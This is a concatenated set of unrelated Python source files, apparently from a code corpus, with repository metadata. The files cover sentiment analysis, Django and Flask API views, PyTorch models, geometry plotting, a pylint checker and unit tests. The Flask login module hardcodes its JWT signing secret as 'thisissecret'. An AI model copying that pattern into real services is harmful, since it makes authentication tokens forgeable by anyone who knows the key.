text=unicode_text.translate(table_p)
tweetDict[count] = [tweet[0],text]
if not os.path.exists(directory):
os.makedirs(directory)
f.write(tweet[1].encode('utf-8'))
f.write('\n')
count += 1
sub = []
pol = []
cnt = 1
for key,value in tweetDict.iteritems():
#if value[0].strip() == dateVal.strip():
#Call to removal_stop_words
text_without_stopwords = remove_stop_words(value[1])
#TextBlob using NaiveBayes
text = TextBlob(text_without_stopwords,analyzer = NaiveBayesAnalyzer())
pol.append(text.sentiment.p_pos)
sub.append(text.sentiment.p_neg)
print(cnt)
cnt += 1
#TextBlob without NaiveBayes
# text = TextBlob(value[1])
# pol.append(text.sentiment.polarity)
# sub.append(text.sentiment.subjectivity)
word_cloud()
resultPolarity = sum(pol)/len(pol)
resultSubjectivity = sum(sub)/len(sub)
print(resultPolarity,resultSubjectivity)
return resultPolarity,resultSubjectivity
#Removal of stopwords
def remove_stop_words(text):
keyword = ' '
stop = set(nltk.corpus.stopwords.words('english'))
for i in text.lower().split():
if i not in stop:
#Stemming
stemmedVar = ps.stem(i)
keyword += ' ' + stemmedVar
return keyword
#Word Cloud
def word_cloud():
keywords_list = ''
for key,value in tweetDict.iteritems():
keyword = remove_stop_words(value[1])
keywords_list += ' ' + keyword
wordcloud = WordCloud().generate(keywords_list)
plt.imshow(wordcloud)
plt.axis("off")
wordcloud = WordCloud(max_font_size=40).generate(keywords_list)
plt.figure()
plt.imshow(wordcloud)
plt.axis("off")
plt.show()
| dhanashriOstwal/electionSentimentAnalysis | Python Scripts/sentimentAnalysis.py | sentimentAnalysis.py | py | 3,158 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "nltk.stem.porter.PorterStemmer",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "string.punctuation",
"line_number": 38,
"usage_type": "attribute"
},
{
"api_name": "stri... |
29450013209 | from ..models import Comment
from ..serializers import CommentSerializer
from rest_framework.response import Response
from rest_framework import permissions, generics
from rest_framework.authtoken.models import Token
from rest_framework.status import HTTP_403_FORBIDDEN
class CommentDetail(generics.RetrieveUpdateDestroyAPIView):
permission_classes = (permissions.IsAuthenticatedOrReadOnly, )
queryset = Comment.objects.all()
serializer_class = CommentSerializer
def put(self, request, *args, **kwargs):
comment = Comment.objects.get(pk=kwargs['pk'])
## Check if the request was sent by the writer
token = request.headers['Authorization'].split()[1]
id = Token.objects.get(pk=token).user.profile
if comment.writer != id:
return Response({"You don't have permissions to perform this action."}, status=HTTP_403_FORBIDDEN)
request.data['parent_meeting'] = comment.parent_meeting.id
request.data['writer'] = comment.writer.id
return self.update(request, *args, **kwargs)
class CommentList(generics.ListCreateAPIView):
permission_classes = (permissions.IsAuthenticatedOrReadOnly, )
queryset = Comment.objects.all()
serializer_class = CommentSerializer
def post(self, request, *args, **kwargs):
token = request.headers['Authorization'].split()[1]
profile = Token.objects.get(pk=token).user.profile
request.data['writer'] = profile.id
return self.create(request, *args, **kwargs)
| thunderlink/ThunderFish | backend/server/views/comment.py | comment.py | py | 1,520 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "rest_framework.generics.RetrieveUpdateDestroyAPIView",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "rest_framework.generics",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "rest_framework.permissions.IsAuthenticatedOrReadOnly",
"line_... |
2911463134 | import torch.nn as nn
import torch.nn.functional as F
class NeuralNet(nn.Module):
def __init__(self):
super(NeuralNet, self).__init__()
self.conv1 = nn.Conv2d(1, 3, kernel_size=(3, 3), stride=1, padding=0)
self.conv2 = nn.Conv2d(3, 6, kernel_size=(4, 4), stride=1, padding=0)
self.maxpool1 = nn.MaxPool2d(kernel_size=(3, 3), stride=2, padding=0)
self.fullCon1 = nn.Linear(in_features=6 * 11 * 11, out_features=360)
self.fullCon2 = nn.Linear(in_features=360, out_features=100)
self.fullCon3 = nn.Linear(in_features=100, out_features=10)
def forward(self, x):
x = F.relu(self.conv1(x))
x = self.maxpool1(F.relu(self.conv2(x)))
x = x.view(-1, 6 * 11 * 11)
x = F.relu(self.fullCon1(x))
x = F.relu(self.fullCon2(x))
x = self.fullCon3(x)
return x
| arunsanknar/AlectioExamples | image_classification/fashion-mnist-and-mnist/model.py | model.py | py | 870 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "torch.nn.Conv2d",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_numbe... |
12152753848 | import numpy as np
import plotly
import plotly.graph_objects as go
def normalize_cam_points(P,x,N):
"""
Normalize the camera matrices and the image points with normalization matrices N.
:param P: ndarray of shape [n_cam, 3, 4], the cameras
:param x: ndarray of shape [n_cam, 3, n_points], the projected image points
:param N: ndarray of shape [n_cam, 3, 3], the normalization matrices
:return: norm_P: ndarray of shape [n_cam, 3, 4], the normalized cameras
norm_x: ndarray of shape [n_cam, 4, n_points], the normalized image points
"""
assert x.shape[1] == 3, "x must be in homographic coordinates"
norm_P = N @ P
norm_x = N @ x
return norm_P, norm_x
def reprojection_errors(P, X, x, visible_points):
"""
Projects the 3D points in X to the cameras P and computes the distance to the real image points x.
:param P: ndarray of shape [n_cam, 3, 4], the cameras
:param X: ndarray of shape [4, n_points], the predicted 3D points
:param x: ndarray of shape [n_cam, 3, n_points], the projected image points
:param visible_points: boolean matrix of shape [n_cam, n_points], what cameras see what points
:return: errors: ndarray of shape [n_cam, n_points], in the ij entry has ||x_ij - pflat(P_i*X_j)||.
The errors in the non-visible entries should be np.nan
"""
assert x.shape[1] == 3, "x must be in homographic coordinates"
proj = P @ X
proj = proj / proj[:,[-1],:]
errors = np.linalg.norm(proj - x, axis=1)
visible_errors = np.where(visible_points, errors, np.nan)
return visible_errors
def decompose_camera_matrix(P, K):
"""
Decompose camera matrices to R and t s.t P[i] = K*R^T[I -t]
:param P: ndarray of shape [n_cam, 3, 4], the cameras
:param K: ndarray of shape [n_cam, 3, 3], the calibration matrices
:return: R: ndarray of shape [n_cam, 3, 3]
t: ndarray of shape [n_cam, 3]
"""
Rt = np.linalg.inv(K) @ P
Rs = np.transpose(Rt[:, :, :3],(0,2,1))
ts = np.squeeze(-Rs @ np.expand_dims(Rt[:, 0:3, 3], axis=-1))
return Rs, ts
def pflat(x):
return x/x[-1]
def plot_cameras(P, K, X, title='reconstruction'):
"""
Plot a 3D image of the points and cameras
:param P: ndarray of shape [n_cam, 3, 4], the cameras
:param K: ndarray of shape [n_cam, 3, 3], the calibration matrices
:param X: ndarray of shape [4, n_points], the predicted 3D points
:param title: the name of the plot
"""
R,t = decompose_camera_matrix(P, K)
data = []
data.append(get_3D_quiver_trace(t, R[:, :3, 2], color='#86CE00', name='cam_learn'))
data.append(get_3D_scater_trace(t.T, color='#86CE00', name='cam_learn', size=1))
data.append(get_3D_scater_trace(X[:3,:], '#3366CC', '3D points', size=0.5))
fig = go.Figure(data=data)
path = title+'.html'
plotly.offline.plot(fig, filename=path, auto_open=False)
def get_3D_quiver_trace(points, directions, color='#bd1540', name=''):
assert points.shape[1] == 3, "3d cone plot input points are not correctely shaped "
assert len(points.shape) == 2, "3d cone plot input points are not correctely shaped "
assert directions.shape[1] == 3, "3d cone plot input directions are not correctely shaped "
assert len(directions.shape) == 2, "3d cone plot input directions are not correctely shaped "
trace = go.Cone(
name=name,
x=points[:, 0],
y=points[:, 1],
z=points[:, 2],
u=directions[:, 0],
v=directions[:, 1],
w=directions[:, 2],
sizemode='absolute',
sizeref=0.5,
showscale=False,
colorscale=[[0, color], [1, color]],
anchor="tail"
)
return trace
def get_3D_scater_trace(points, color, name,size=0.5):
assert points.shape[0] == 3, "3d plot input points are not correctely shaped "
assert len(points.shape) == 2, "3d plot input points are not correctely shaped "
trace = go.Scatter3d(
name=name,
x=points[0, :],
y=points[1, :],
z=points[2, :],
mode='markers',
marker=dict(
size=size,
color=color,
)
)
return trace
| antebi-itai/Weizmann | Multiple View Geometry/Assignment 5/Solution/code/utils.py | utils.py | py | 4,188 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.linalg.norm",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "numpy.linalg",
"line_number": 34,
"usage_type": "attribute"
},
{
"api_name": "numpy.where",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "numpy.nan",
"line... |
22355103302 | # coding: utf-8
import os
import random
import time
import cv2
import numpy as np
import torch
from torch import nn, optim
from tqdm import tqdm
import matplotlib.pyplot as plt
import modules
class Classifier:
chinese_characters = ['云', '京', '冀', '吉', '宁', '川', '新', '晋', '桂', '沪',
'津', '浙', '渝', '湘', '琼', '甘', '皖', '粤', '苏', '蒙',
'藏', '豫', '贵', '赣', '辽', '鄂', '闽', '陕', '青', '鲁',
'黑']
other_characters = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9',
'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'J', 'K',
'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'U', 'V',
'W', 'X', 'Y', 'Z']
def __init__(self, load_path=None, dataset_path=None, train_proportion=0.8, save_path=None, is_chinese=True):
if torch.cuda.is_available():
torch.set_default_tensor_type('torch.cuda.FloatTensor')
if load_path:
self.cnn = torch.load(load_path)
elif is_chinese:
self.cnn = modules.MyCNN(len(self.chinese_characters))
else:
self.cnn = modules.MyCNN(len(self.other_characters))
self.characters = self.chinese_characters if is_chinese else self.other_characters
self.character_dict = dict([(c, i) for i, c in enumerate(self.characters)])
self.train_images, self.train_labels = ([], []) if not dataset_path else self.read_dataset(dataset_path)
self.eval_images, self.eval_labels = ([], [])
self.train_proportion = train_proportion
self.save_path = save_path
def predict(self, images, batch_size=8, to_character=True):
"""
Predict labels.
"""
images = np.array(images, )
pred_labels = []
self.cnn.eval()
for start in range(0, len(images), batch_size):
outputs = self.cnn(torch.tensor(images[start:start + batch_size], dtype=torch.float32))
pred_labels += outputs.softmax(1).argmax(1).tolist()
return [self.characters[idx] for idx in pred_labels] if to_character else pred_labels
def train(self, num_epochs, train_batch_size=8, method='adam', lr=0.01, momentum=0, do_eval=True,
eval_batch_size=8):
"""
Train, and evaluate if specified.
"""
assert train_batch_size > 0 and eval_batch_size > 0
optimizer = self.get_optimizer(method=method, lr=lr, momentum=momentum)
train_accuracy_list = []
eval_accuracy_list = []
for epoch in range(num_epochs):
self.shuffle_dataset()
# Train
print('-' * 20 + 'Training epoch %d' % epoch + '-' * 20, flush=True)
time.sleep(0.1)
num_correct = 0
for start in tqdm(range(0, len(self.train_images), train_batch_size), desc='Training batch: '):
images = self.train_images[start:start + train_batch_size]
actual_labels = self.train_labels[start:start + train_batch_size]
# Forward
images = torch.tensor(np.array(images), dtype=torch.float32)
outputs = self.cnn(images)
# Backward
batch_labels = torch.tensor(actual_labels, dtype=torch.int64)
self.cnn.zero_grad()
loss = nn.CrossEntropyLoss()(outputs, batch_labels)
loss.backward()
optimizer.step()
# Calculate metrics
pred_labels = outputs.softmax(1).argmax(1).tolist()
num_correct += np.equal(pred_labels, actual_labels).sum()
acc = num_correct / len(self.train_images)
print('Accuracy:', acc)
train_accuracy_list.append(acc)
self.save_cnn(str(epoch) + '.pth')
# Evaluate
if not do_eval:
continue
num_correct = 0
print('-' * 20 + 'Evaluating epoch %d' % epoch + '-' * 20, flush=True)
time.sleep(0.1)
for start in tqdm(range(0, len(self.eval_images), eval_batch_size), desc='Evaluating batch: '):
images = self.eval_images[start:start + eval_batch_size]
actual_labels = self.eval_labels[start:start + eval_batch_size]
# Forward
images = torch.tensor(images, dtype=torch.float32)
outputs = self.cnn(images)
# Get results
pred_labels = outputs.softmax(1).argmax(1).tolist()
num_correct += np.equal(pred_labels, actual_labels).sum()
acc = num_correct / len(self.eval_images)
print('Accuracy:', acc)
eval_accuracy_list.append(acc)
plt.plot(train_accuracy_list)
plt.plot(eval_accuracy_list)
plt.legend(['train', 'eval'])
plt.show()
def get_optimizer(self, method='adam', lr=0.01, momentum=0):
if method == 'sgd':
return optim.SGD(self.cnn.parameters(), lr=lr, momentum=momentum)
elif method == 'adam':
return optim.Adam(self.cnn.parameters(), lr=lr)
else:
return None
def shuffle_dataset(self):
images = self.train_images + self.eval_images
labels = self.train_labels + self.eval_labels
seed = time.time()
random.seed(seed)
random.shuffle(images)
random.seed(seed)
random.shuffle(labels)
split_index = int(self.train_proportion * len(images))
self.train_images, self.train_labels = images[:split_index], labels[:split_index]
self.eval_images, self.eval_labels = images[split_index:], labels[split_index:]
def save_cnn(self, name):
if not self.save_path:
return None
elif not os.path.exists(self.save_path):
os.makedirs(self.save_path)
torch.save(self.cnn, os.path.join(self.save_path, name))
def read_dataset(self, path):
print('-' * 20 + 'Reading data' + '-' * 20, flush=True)
images, labels = [], []
for character in tqdm(self.characters):
current_dir = os.path.join(path, character)
for file_name in os.listdir(current_dir):
file_path = os.path.join(current_dir, file_name)
image = cv2.imdecode(np.fromfile(file_path, dtype=np.uint8), cv2.IMREAD_GRAYSCALE)
label = self.character_dict[character]
images.append(image)
labels.append(label)
return images, labels
| QQQQQby/Car-Plate-Recognition | classifier.py | classifier.py | py | 6,613 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "torch.cuda.is_available",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "torch.set_default_tensor_type",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": ... |
15980397887 | """Check for usage of models that were replaced in 2.0."""
from pylint.checkers import BaseChecker
from pylint.interfaces import IAstroidChecker
class NautobotReplacedModelsImportChecker(BaseChecker):
"""Visit 'import from' statements to find usage of models that have been replaced in 2.0."""
__implements__ = IAstroidChecker
version_specifier = ">=2,<3"
name = "nautobot-replaced-models"
msgs = {
"E4211": (
"Imports a model that has been replaced (dcim.DeviceRole -> extras.Role).",
"nb-replaced-device-role",
"Reference: https://docs.nautobot.com/projects/core/en/next/development/apps/migration/model-updates/extras/#replace-role-related-models-with-generic-role-model",
),
"E4212": (
"Imports a model that has been replaced (dcim.RackRole -> extras.Role).",
"nb-replaced-rack-role",
"Reference: https://docs.nautobot.com/projects/core/en/next/development/apps/migration/model-updates/extras/#replace-role-related-models-with-generic-role-model",
),
"E4213": (
"Imports a model that has been replaced (ipam.Role -> extras.Role).",
"nb-replaced-ipam-role",
"Reference: https://docs.nautobot.com/projects/core/en/next/development/apps/migration/model-updates/extras/#replace-role-related-models-with-generic-role-model",
),
"E4214": (
"Imports a model that has been replaced (dcim.Region -> dcim.Location).",
"nb-replaced-region",
"Reference: https://docs.nautobot.com/projects/core/en/next/development/apps/migration/model-updates/dcim/#replace-site-and-region-with-location-model",
),
"E4215": (
"Imports a model that has been replaced (dcim.Site -> dcim.Location).",
"nb-replaced-site",
"Reference: https://docs.nautobot.com/projects/core/en/next/development/apps/migration/model-updates/dcim/#replace-site-and-region-with-location-model",
),
"E4216": (
"Imports a model that has been replaced (ipam.Aggregate -> ipam.Prefix).",
"nb-replaced-aggregate",
"Reference: https://docs.nautobot.com/projects/core/en/next/development/apps/migration/model-updates/ipam/#replace-aggregate-with-prefix",
),
}
def visit_importfrom(self, node):
if node.modname == "nautobot.dcim.models":
for name, _ in node.names:
if name == "DeviceRole":
self.add_message("nb-replaced-device-role", node=node)
elif name == "RackRole":
self.add_message("nb-replaced-rack-role", node=node)
elif name == "Region":
self.add_message("nb-replaced-region", node=node)
elif name == "Site":
self.add_message("nb-replaced-site", node=node)
if node.modname == "nautobot.ipam.models":
for name, _ in node.names:
if name == "Role":
self.add_message("nb-replaced-ipam-role", node=node)
elif name == "Aggregate":
self.add_message("nb-replaced-aggregate", node=node)
| nautobot/pylint-nautobot | pylint_nautobot/replaced_models.py | replaced_models.py | py | 3,231 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "pylint.checkers.BaseChecker",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "pylint.interfaces.IAstroidChecker",
"line_number": 9,
"usage_type": "name"
}
] |
26034310554 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
# In[2]:
commercial = pd.read_csv('./commercial.csv')
commercial
# In[3]:
# 끝에 5개 데이터만 추출
commercial.tail(5)
# In[5]:
list(commercial), len(list(commercial))
# In[7]:
commercial.groupby('상가업소번호')['상권업종소분류명'].count().sort_values(ascending=False)
# In[10]:
category_range = set(commercial['상권업종소분류명'])
category_range, len(category_range)
# In[11]:
commercial['도로명주소']
# In[15]:
# 서울시 데이터만 가져오기
# 3덩어리로 쪼갠 후 새로운 칼럼 추가
commercial[['시','구','상세주소']] = commercial['도로명주소'].str.split(' ',n=2, expand=True)
# In[16]:
commercial.tail(5)
# In[18]:
# 서울특별시의 데이터만 추출
seoul_data = commercial[ commercial['시'] == '서울특별시']
seoul_data.tail(5)
# In[22]:
# 서울만 있는지 확인하기(집합연산)
city_type = set(seoul_data['시'])
city_type
# In[24]:
# 서울 치킨집만 추출
seoul_chicken_data = seoul_data[ seoul_data['상권업종소분류명'] == '후라이드/양념치킨' ]
seoul_chicken_data
# In[31]:
sorted_chicken_count_by_gu = seoul_chicken_data.groupby('구')['상권업종소분류명'].count().sort_values(ascending=False)
sorted_chicken_count_by_gu
# In[33]:
import matplotlib.pyplot as plt
plt.rcParams['font.family'] = 'Malgun Gothic'
# In[34]:
plt.figure(figsize=(10,5))
plt.bar(sorted_chicken_count_by_gu.index, sorted_chicken_count_by_gu)
plt.title('구에 따른 치킨 매장 수')
plt.xticks(rotation = 90)
plt.show()
# In[38]:
# 지도에 그리기
import folium
import json
# In[41]:
# 지도정보 불러오기
seoul_geo = './seoul_geo.json'
geo_data = json.load(open(seoul_geo, encoding = 'utf-8'))
geo_data
# In[50]:
# 지도 만들기
map = folium.Map(location=[37.5502, 126.982], zoom_start=11)
map
# In[51]:
folium.Choropleth(geo_data = geo_data,
data=sorted_chicken_count_by_gu,
colums=[sorted_chicken_count_by_gu.index, sorted_chicken_count_by_gu],
fill_color='PuRd',
key_on='properties.name').add_to(map)
map
# In[ ]:
| dleorud111/chicken_data_geo_graph | 치킨 매장 수에 따른 지도 그리기.py | 치킨 매장 수에 따른 지도 그리기.py | py | 2,238 | python | ko | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.rcParams",
"line_number": 98,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 98,
"usage_type": "name"
},
{
"api_name": "mat... |
27823324545 | import requests
from bs4 import BeautifulSoup
import zlib #crc32加密
list_cyc32=[]
list_url=[]
import re
# # 为了用xpath
user_agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0'
headers = {'User-Agent': user_agent}
# url="https://www.cnblogs.com/mayswind/p/15116918.html"
url="https://www.cnblogs.com/mayswind/default.html?page=3"
r = requests.get(url, headers=headers)
r.encoding = 'utf-8'
result=[]
soup=BeautifulSoup(r.text,'lxml')
#############crc32加密 只需要传str类型就行################
def crc32(x_url):
return zlib.crc32(bytes(x_url, "utf-8"))
#############crc32加密 只需要传str类型就行################
############ 传入url 得到soup###########################
def get_soup (url):
user_agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0'
headers = {'User-Agent': user_agent}
r = requests.get(url, headers=headers)
r.encoding = 'utf-8'
result=[]
soup = BeautifulSoup(r.text, 'lxml')
return soup
############ 传入url 得到soup###########################
#############找到作者所有的文章##########################
def fd_all(url):
global list_cyc32
for i in range(1, 9999):
url = "/".join(url.split("/")[0:4]) + "/default.html?page=" + str(i)
if (get_soup(url).find_all(name='a', attrs={'class': 'postTitle2 vertical-middle'}) == []):
break
items = get_soup(url).find_all(name='a', attrs={'class': 'postTitle2 vertical-middle'})
for i in items:
list_cyc32 = crc32(i.get('href'))
list_url=i.get('href')
#############找到作者所有的文章##########################
print(crc32(url))
print(list_url) | Madlife1/pythonProject2 | url_spider.py | url_spider.py | py | 1,896 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "zlib.crc32",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_nu... |
14551208863 | from fractions import Fraction
from hypothesis import given
from jubeatools import song
from jubeatools.formats.timemap import TimeMap
from jubeatools.testutils import strategies as jbst
from jubeatools.utils import group_by
@given(jbst.timing_info(with_bpm_changes=True), jbst.beat_time())
def test_that_seconds_at_beat_works_like_the_naive_approach(
timing: song.Timing, beat: song.BeatsTime
) -> None:
time_map = TimeMap.from_timing(timing)
expected = naive_approach(timing, beat)
actual = time_map.fractional_seconds_at(beat)
assert actual == expected
def naive_approach(beats: song.Timing, beat: song.BeatsTime) -> Fraction:
if beat < 0:
raise ValueError("Can't compute seconds at negative beat")
if not beats.events:
raise ValueError("No BPM defined")
grouped_by_time = group_by(beats.events, key=lambda e: e.time)
for time, events in grouped_by_time.items():
if len(events) > 1:
raise ValueError(f"Multiple BPMs defined on beat {time} : {events}")
sorted_events = sorted(beats.events, key=lambda e: e.time)
first_event = sorted_events[0]
if first_event.time != song.BeatsTime(0):
raise ValueError("First BPM event is not on beat zero")
if beat > sorted_events[-1].time:
events_before = sorted_events
else:
last_index = next(i for i, e in enumerate(sorted_events) if e.time >= beat)
events_before = sorted_events[:last_index]
total_seconds = Fraction(0)
current_beat = beat
for event in reversed(events_before):
beats_since_previous = current_beat - event.time
seconds_since_previous = (60 * beats_since_previous) / Fraction(event.BPM)
total_seconds += seconds_since_previous
current_beat = event.time
total_seconds = total_seconds + Fraction(beats.beat_zero_offset)
return total_seconds
| Stepland/jubeatools | jubeatools/formats/konami/eve/tests/test_timemap.py | test_timemap.py | py | 1,881 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "jubeatools.song.Timing",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "jubeatools.song",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "jubeatools.song.BeatsTime",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_na... |
12336375941 | #!/usr/bin/python3
"""
Defines requests for the drivers route
"""
from api.v1.views import app_views
from flask import jsonify, request, make_response
from functools import wraps
from hashlib import md5
from models import storage
from models.users import User
import datetime
import jwt
SECRET_KEY = 'thisissecret'
def token_required(f):
"""
checks given token if valid to access route
"""
@wraps(f)
def decorated(*args, **kwargs):
token = None
if 'x-access-token' in request.headers:
token = request.headers['x-access-token']
if not token:
return jsonify({'message' : 'Token is missing!'}), 401
try:
data = jwt.decode(token, SECRET_KEY, algorithms=['HS256'])
except Exception:
return jsonify({'message' : 'Token Expired, Please Log In Again!'}), 401
users = storage.all(User).values()
current_user = None
for user in users:
if user.id == data['id']:
current_user = user
if not current_user:
return jsonify({'message' : 'Token is invalid!'}), 401
return f(current_user, *args, **kwargs)
return decorated
@app_views.route('/login', strict_slashes=False, methods=['POST'])
def login():
"""
validates user login before assigning a json web token
"""
body = request.get_json()
all_users = storage.all(User).values()
user = None
for item in all_users:
if item.email == body.get("email"):
user = item
break
if not user:
return (make_response(jsonify({"error": "Invalid Username"}), 401,
{'WWW-Authenticate' : 'Basic realm="Login required!"'}))
if user.check_password(body.get("password")):
token = jwt.encode(
{'id' : user.id,
'exp' : datetime.datetime.utcnow() + datetime.timedelta(hours=24)
}, SECRET_KEY, algorithm='HS256')
response = jsonify({'token' : token,
"user": {
"id": user.id,
"first_name": user.first_name,
"last_name": user.last_name,
"phonenumber": user.phonenumber,
"email": user.email
}})
return response, 200
return (make_response(
'Invalid Password', 401,
{'WWW-Authenticate' : 'Basic realm="Login required!"'}))
| NamasakaLennox/Msimu | backend/api/v1/auth.py | auth.py | py | 2,555 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.request.headers",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "flask.request.headers",
"line_number": 26,
"usage_type": "attribute"
},
{
"api_name": "f... |
29524986199 | import os
import tempfile
import time
import unittest
from Tools import ValkyrieTools
class TestTools(unittest.TestCase):
def test_isFloat(self):
self.assertTrue(ValkyrieTools.isFloat('1.0'))
self.assertFalse(ValkyrieTools.isFloat(1))
def test_isInteger(self):
self.assertTrue(ValkyrieTools.isInteger(1))
self.assertFalse(ValkyrieTools.isInteger(1.3))
def test_isBoolean(self):
self.assertTrue(ValkyrieTools.isBoolean('True'))
self.assertTrue(ValkyrieTools.isBoolean('False'))
self.assertTrue(ValkyrieTools.isBoolean('Yes'))
self.assertTrue(ValkyrieTools.isBoolean('No'))
self.assertFalse(ValkyrieTools.isBoolean('1'))
self.assertFalse(ValkyrieTools.isBoolean('0'))
self.assertTrue(ValkyrieTools.isBoolean(1))
self.assertTrue(ValkyrieTools.isBoolean(0))
self.assertFalse(ValkyrieTools.isBoolean('Maybe'))
def test_isList(self):
self.assertTrue(ValkyrieTools.isList([1, 2, 3]))
self.assertFalse(ValkyrieTools.isList({'a': 1, 'b': 2}))
def test_isDict(self):
self.assertTrue(ValkyrieTools.isDict({'a': 1, 'b': 2}))
self.assertFalse(ValkyrieTools.isDict([1, 2, 3]))
def test_isJson(self):
self.assertTrue(ValkyrieTools.isJson('{"key": "value"}'))
self.assertFalse(ValkyrieTools.isJson('invalid_json'))
def test_matchDict(self):
test_dict = {
"a": "1", "b": "2", "c": "3", "d": "True", "e": "false", "f": "Yes", "g": "NO",
"h": "1.3", "i": "1.0", "j": "5", "k": "Maybe", "l": "[1, 2, 3]", "m": "{'a': 1, 'b': 2}"
}
expected_result = {'a': 1, 'b': 2, 'c': 3, 'd': True, 'e': False, 'f': True, 'g': False,
'h': 1.3, 'i': 1.0, 'j': 5, 'k': 'Maybe', 'l': [1, 2, 3], 'm': {'a': 1, 'b': 2}}
self.assertEqual(ValkyrieTools.matchDict(test_dict), expected_result)
def test_formatSize(self):
self.assertEqual(ValkyrieTools.formatSize(1000000000), '1.00 GB')
self.assertEqual(ValkyrieTools.formatSize(1000000), '1.00 MB')
self.assertEqual(ValkyrieTools.formatSize(1000), '1.00 KB')
self.assertEqual(ValkyrieTools.formatSize(500), '500.00 B')
def test_formatSpeed(self):
self.assertEqual(ValkyrieTools.formatSpeed(1000000), '1.00 MB/s')
self.assertEqual(ValkyrieTools.formatSpeed(1000), '1.00 KB/s')
self.assertEqual(ValkyrieTools.formatSpeed(500), '500.00 B/s')
def test_formatTime(self):
self.assertEqual(ValkyrieTools.formatTime(1000000), '11.57 days')
self.assertEqual(ValkyrieTools.formatTime(3600), '1.00 hours')
self.assertEqual(ValkyrieTools.formatTime(120), '2.00 minutes')
self.assertEqual(ValkyrieTools.formatTime(30), '30.00 seconds')
def test_formatNumber(self):
self.assertEqual(ValkyrieTools.formatNumber(1234567.89), '1,234,567.89')
def test_generateHwid(self):
# As this function generates a unique hardware ID, it's difficult to test for a specific result.
# You can verify that it returns a non-empty string, for example.
hwid = ValkyrieTools.generateHwid()
self.assertTrue(hwid)
def test_generateCode(self):
code_length = 32
generated_code = ValkyrieTools.generateCode(code_length)
self.assertEqual(len(generated_code), code_length)
def test_markdownHtml(self):
markdown_text = '**Hello** *World*!'
expected_html = '<b>Hello</b> <i>World</i>!'
self.assertEqual(ValkyrieTools.markdownHtml(markdown_text), expected_html)
def test_getHash(self):
data = b'This is some data to hash'
expected_md5_hash = 'fbe8ee5bbfd9ec0c6f1949ba2ac9e0d7'
expected_sha1_hash = '6acc0ca14c9cd14671c1034a36396066c00ad053'
expected_sha256_hash = '09b0d6cdcb1dc978740a4510cfbce9308423817d78447a7345bafc2950c8ff7b'
expected_sha512_hash = '6b0e3ed391e918823f5faf249c3e077ad9f5681d1d9b6c19f4e669caae3d8abefbf0bb9d443150ab62632e69554d0d22ae6be9c70334005ba0566bd6c2eff822'
self.assertEqual(ValkyrieTools.getHash(data, 'md5'), expected_md5_hash)
self.assertEqual(ValkyrieTools.getHash(data, 'sha1'), expected_sha1_hash)
self.assertEqual(ValkyrieTools.getHash(data, 'sha256'), expected_sha256_hash)
self.assertEqual(ValkyrieTools.getHash(data, 'sha512'), expected_sha512_hash)
def test_getFileHash(self):
file_content = "This is the file content."
temp_path = tempfile.gettempdir()
temp_file = tempfile.NamedTemporaryFile(dir=temp_path, delete=False)
temp_file.write(file_content.encode('utf-8'))
temp_file.close()
expected_md5_hash = '066f587e2cff2588e117fc51a522c47e'
expected_sha1_hash = '7a2dc28ce65f9b346523bd0e2f177d3b7357aba1'
expected_sha256_hash = 'dc9dbf28907435fb339baac4eb2b386538570c20ba1fcd3373f9c24d95a84ff4'
expected_sha512_hash = 'b345bc4c99404c161d67793aa412d8120a9831cfa4f307a8e8b8b290530665b17675106f5d6eebfdc0a82e43d2d4207a6485d5ff8d8dc124d0e20681d150a609'
self.assertEqual(ValkyrieTools.getFileHash(temp_file.name, 'md5'), expected_md5_hash)
self.assertEqual(ValkyrieTools.getFileHash(temp_file.name, 'sha1'), expected_sha1_hash)
self.assertEqual(ValkyrieTools.getFileHash(temp_file.name, 'sha256'), expected_sha256_hash)
self.assertEqual(ValkyrieTools.getFileHash(temp_file.name, 'sha512'), expected_sha512_hash)
def test_getFileData(self):
file_content = b'This is the file content.'
with tempfile.NamedTemporaryFile(delete=False) as temp_file:
temp_file.write(file_content)
